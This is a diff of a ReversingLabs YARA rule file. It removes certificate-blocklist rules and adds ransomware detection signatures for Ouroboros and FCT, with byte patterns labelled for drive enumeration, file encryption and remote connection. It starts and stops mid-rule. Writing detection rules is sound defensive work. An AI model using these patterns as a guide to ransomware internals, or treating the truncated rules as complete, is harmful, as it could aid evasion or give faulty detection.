48 8B CB FF 15 ?? ?? + ?? ?? 48 85 DB 74 ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CE E8 ?? ?? ?? ?? 90 48 8B 95 + ?? ?? ?? ?? 48 83 FA ?? 72 ?? 48 FF C2 48 8B 4D ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 + ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 33 F6 48 89 B5 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 40 88 75 ?? 48 + 8B 95 ?? ?? ?? ?? 48 83 FA ?? 0F 82 ?? ?? ?? ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 8D ?? + ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 48 83 C2 ?? 48 8B 49 ?? 48 + 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 86 ?? ?? ?? ?? FF 15 + } + $enum_drives = { + 48 89 5D ?? 48 C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? FF 15 ?? ?? ?? ?? 8B F8 0F A3 DF 0F + 83 ?? ?? ?? ?? 8D 4B ?? 48 C7 45 ?? ?? ?? ?? ?? 88 4D ?? 48 C7 45 ?? ?? ?? ?? ?? 66 + C7 45 ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 3B 05 ?? ?? ?? ?? 74 ?? 48 8D 55 ?? 48 8B C8 + E8 ?? ?? ?? ?? 48 83 05 ?? ?? ?? ?? ?? EB ?? 4C 8D 45 ?? 48 8B D0 48 8D 0D ?? ?? ?? + ?? E8 ?? ?? ?? ?? 90 48 8B 45 ?? 48 83 F8 ?? 72 ?? 48 8D 50 ?? 48 8B 4D ?? 48 8B C1 + 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? + 77 ?? E8 ?? ?? ?? ?? FF C3 83 FB ?? 0F 8C ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? + E8 ?? ?? ?? ?? 90 33 C0 48 8B 4D ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 5C 24 ?? 49 8B 5B + ?? 49 8B 7B ?? 49 8B E3 5D C3 FF 15 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Fangzhen Li" and pe.signatures[i].serial=="1c:b0:6d:cc:b4:82:25:57:28:67:1e:a1:2a:c4:16:20" and 1445126399<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($enum_drives) and ($find_files) and ( all of ($encrypt_files_p*)) and ($drop_ransom_note) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_370C2467C41D6019Bbecd72E00C5D73D : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Ouroboros : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Ouroboros ransomware." author = "ReversingLabs" - id = "18c5d1bb-21b8-5157-a03b-8bcbdc74c0cd" - date = "2023-11-08" - modified = "2023-11-08" + id = "af0b9311-a7dd-56e8-a004-0828af5af5ef" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1816-L1832" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2b99522b75ee83d85b30146cb292b5a8a46dc300fb43dd9d39d9ca96c9d32d9b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Ouroboros.yara#L1-L175" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b573f303318452010ff46f21a02b6290820f9a27bf4c51b72f6ed15263b5f433" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Ouroboros" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "UNINFO SISTEMAS LTDA ME" and pe.signatures[i].serial=="37:0c:24:67:c4:1d:60:19:bb:ec:d7:2e:00:c5:d7:3d" and 1445299199<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_5067339614C5Cc219C489D40420F3Bf9 : INFO FILE -{ - meta: - description = "The digital certificate has leaked." - author = "ReversingLabs" - id = "6e0cb6f9-0a92-5eb2-b13f-f9c4eb0ae6b1" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1834-L1850" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1716087285a093a3467583f79d7ae9bee641997227e6d4f95047905aedcc97c6" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $remote_connection_p1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? + 33 C5 89 45 ?? 56 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 75 ?? 8D 8D ?? ?? ?? ?? 6A ?? 68 + ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? + ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 8D 8D ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? + 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? + ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 + ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C7 85 ?? + ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? + ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? + C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 + } + $remote_connection_p2 = { + C6 45 ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? + C6 45 ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 + ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? + C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8B + 95 ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? + ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? + ?? ?? 83 C4 ?? FF 75 ?? 8D 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 75 ?? 8D 8D ?? ?? + ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 8D 45 ?? C6 85 ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? + ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 4D ?? E8 + ?? ?? ?? ?? 50 8B CE C7 06 ?? ?? ?? ?? C6 46 ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 83 FA ?? + 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 + } + $remote_connection_p3 = { + F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? + C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? FF 70 ?? 8D 45 ?? 50 8B C8 E8 ?? ?? ?? ?? 6A ?? FF + 75 ?? E8 ?? ?? ?? ?? 8B 55 ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? + ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? + ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 + FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 + ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? C7 45 ?? ?? ?? + ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? FF 70 ?? 8D 45 ?? 50 8B C8 E8 ?? ?? ?? ?? 6A + ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? + ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 + ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? + ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 85 C9 74 ?? 8B 95 ?? ?? ?? + ?? 8B C1 2B D1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F + 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 C4 ?? C7 85 ?? + ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8B C6 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $remote_connection_p4 = { + 8B 55 ?? C7 06 ?? ?? ?? ?? C6 46 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? + ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? + ?? ?? ?? 83 C4 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? FF + 70 ?? 8D 45 ?? 50 8B C8 E8 ?? ?? ?? ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 55 ?? 83 C4 + ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 + 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? + ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA + ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 + E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? + ?? FF 70 ?? 8D 45 ?? 50 8B C8 E8 ?? ?? ?? ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 95 ?? + ?? ?? ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? + 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 8D + ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? + ?? ?? ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C1 2B D1 81 FA ?? ?? ?? ?? 0F + 82 ?? ?? ?? ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 86 ?? ?? ?? ?? E8 ?? ?? + ?? ?? E8 ?? ?? ?? ?? E8 + } + $find_files = { + 8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 83 C8 ?? 57 8B 7D ?? + 41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ?? + ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? + FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 4D ?? + 56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 C0 50 + 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 + 89 45 ?? 8B 4D ?? 53 8B 5D ?? 56 8B 75 ?? 57 89 B5 ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74 + ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 53 E8 ?? ?? ?? ?? 59 59 8B C8 3B CB 75 ?? 8A 11 80 FA + ?? 75 ?? 8D 43 ?? 3B C8 74 ?? 56 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 FF + 80 FA ?? 74 ?? 80 FA ?? 74 ?? 80 FA ?? 74 ?? 8B C7 EB ?? 33 C0 40 0F B6 C0 2B CB 41 + F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? + ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? + ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 + FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? + 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 + 74 ?? 80 F9 ?? 75 ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? + ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? + ?? 85 C0 8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B + C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 + ?? E9 + } + $encrypt_files_p1 = { + 83 EC ?? 8B 44 24 ?? 53 55 56 8B F1 89 44 24 ?? 57 8B 7C 24 ?? 8B 6E ?? 3B FD 77 ?? + 8B DE 83 FD ?? 72 ?? 8B 1E 57 50 53 89 7E ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 04 1F ?? 8B + C6 5F 5E 5D 5B 83 C4 ?? C2 ?? ?? 81 FF ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 8B DF 83 CB ?? + 81 FB ?? ?? ?? ?? 76 ?? BB ?? ?? ?? ?? EB ?? 8B CD B8 ?? ?? ?? ?? D1 E9 2B C1 3B E8 + 76 ?? BB ?? ?? ?? ?? EB ?? 8D 04 29 3B D8 0F 42 D8 33 C9 8B C3 83 C0 ?? 0F 92 C1 F7 + D9 0B C8 51 8B CE E8 ?? ?? ?? ?? 57 FF 74 24 ?? 89 44 24 ?? 50 89 7E ?? 89 5E ?? E8 + ?? ?? ?? ?? 8B 5C 24 ?? 83 C4 ?? C6 04 1F ?? 83 FD ?? 72 ?? 8B 06 45 81 FD ?? ?? ?? + ?? 72 ?? 8B 48 ?? 83 C5 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 8B C1 55 50 E8 ?? ?? ?? ?? + 83 C4 ?? 5F 89 1E 8B C6 5E 5D 5B 83 C4 ?? C2 ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? CC + CC CC CC CC 83 EC ?? 53 55 8B 6C 24 ?? 56 57 8B F9 8B 4C 24 ?? 89 4C 24 ?? 8B 5F ?? + 3B EB 77 ?? 89 7C 24 ?? 8B C7 83 FB ?? 72 ?? 8B 07 89 44 24 ?? 8D 34 6D + } + $encrypt_files_p2 = { + 89 6F ?? 56 51 50 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 33 C9 66 89 0C 06 8B C7 5F 5E + 5D 5B 83 C4 ?? C2 ?? ?? 81 FD ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 8B F5 83 CE ?? 81 FE ?? + ?? ?? ?? 76 ?? BE ?? ?? ?? ?? EB ?? 8B CB B8 ?? ?? ?? ?? D1 E9 2B C1 3B D8 76 ?? BE + ?? ?? ?? ?? EB ?? 8D 04 19 3B F0 0F 42 F0 33 C9 8B C6 83 C0 ?? 0F 92 C1 F7 D9 0B C8 + 51 8B CF E8 ?? ?? ?? ?? 89 77 ?? 8D 34 6D ?? ?? ?? ?? 56 FF 74 24 ?? 89 44 24 ?? 50 + 89 6F ?? E8 ?? ?? ?? ?? 8B 6C 24 ?? 33 C0 83 C4 ?? 66 89 04 2E 83 FB ?? 72 ?? 8B 07 + 8D 1C 5D ?? ?? ?? ?? 81 FB ?? ?? ?? ?? 72 ?? 8B 48 ?? 83 C3 ?? 2B C1 83 C0 ?? 83 F8 + ?? 77 ?? 8B C1 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 2F 8B C7 5F 5E 5D 5B 83 C4 ?? C2 ?? + ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? CC 8B 44 24 ?? 83 EC ?? 83 E0 ?? 89 41 ?? 8B 49 ?? + 23 C8 75 ?? 83 C4 ?? C2 ?? ?? 56 F6 C1 ?? 74 ?? BE ?? ?? ?? ?? EB ?? F6 C1 ?? BE ?? + ?? ?? ?? B8 ?? ?? ?? ?? 0F 44 F0 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C + 24 ?? 50 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 5E + } + $encrypt_files_angus_version = { + 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? + ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? + ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 85 + ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 03 C1 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 0F 43 + 8D ?? ?? ?? ?? 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? + ?? ?? ?? B9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 39 8D ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? C6 85 ?? ?? ?? ?? ?? 0F 42 8D ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 51 0F 43 85 ?? + ?? ?? ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? + C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? + ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? + ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 + ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? C7 85 ?? + ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? + ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? + C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? + C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? + ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D + ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E8 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "D-LINK CORPORATION" and pe.signatures[i].serial=="50:67:33:96:14:c5:cc:21:9c:48:9d:40:42:0f:3b:f9" and 1441238400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and (( all of ($encrypt_files_p*)) or ($encrypt_files_angus_version)) and ( all of ($remote_connection_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_6E32531Ae83992F0573120A5E78De271 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_FCT : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects FCT ransomware." author = "ReversingLabs" - id = "37fc58ea-63d4-569d-968f-f4775403b0bb" - date = "2023-11-08" - modified = "2023-11-08" + id = "ea3d5514-d6f2-5fd0-9247-a3f6b920d8d9" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1852-L1868" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2b6d54ea8395c3666906b2e60c30b970c2c1b6f55ded874cbcc22dc79391fb34" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.FCT.yara#L1-L86" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b158ad56c92a926f7398a27b3576c259e39c9716ef192fa5944ce3cffdc6d7d0" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "FCT" + tc_detection_factor = 5 importance = 25 + strings: + $find_files_p1 = { + 6A ?? 68 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? 6A ?? E8 ?? ?? + ?? ?? 83 7D ?? ?? 8D 8D ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? 89 + 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 6A ?? 51 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 + 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 33 DB 8B 55 ?? 33 C9 8B 75 + ?? 89 9D ?? ?? ?? ?? 85 D2 74 ?? 66 90 83 7D ?? ?? 8D 45 ?? 0F 43 C6 0F BE 04 08 41 + 03 D8 3B CA 72 ?? 89 9D ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? + ?? ?? ?? 66 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B CF C7 45 ?? ?? ?? ?? ?? 33 C0 + C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 8D 51 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 + F9 51 57 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 75 ?? 8B C6 8B 55 ?? 2B C2 83 F8 ?? + 72 ?? 83 FE ?? 8D 45 ?? 8D 4A ?? BB ?? ?? ?? ?? 0F 43 45 ?? 89 4D ?? 66 89 1C 50 33 + D2 66 89 14 48 EB ?? 6A ?? 68 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ?? + ?? ?? 6A ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 + } + $find_files_p2 = { + 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 + ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? + 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 9D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? + 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B BD ?? ?? ?? ?? E9 ?? ?? ?? ?? 53 FF 15 ?? ?? + ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 55 ?? 8D 48 ?? 8B C2 81 F9 ?? ?? ?? ?? 72 ?? 8B 52 + ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 77 ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 + FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 + C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D + ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 E8 + } + $encrypt_files_p1 = { + 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51 57 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? + ?? 8B 